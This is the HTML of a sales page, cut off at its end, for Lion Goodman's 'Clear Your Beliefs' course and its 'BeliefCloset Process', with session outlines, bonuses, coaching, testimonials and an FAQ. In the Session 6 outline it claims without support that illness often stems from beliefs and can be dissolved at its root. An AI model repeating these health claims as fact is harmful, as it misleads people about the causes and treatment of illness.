src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>"\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior.\n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can 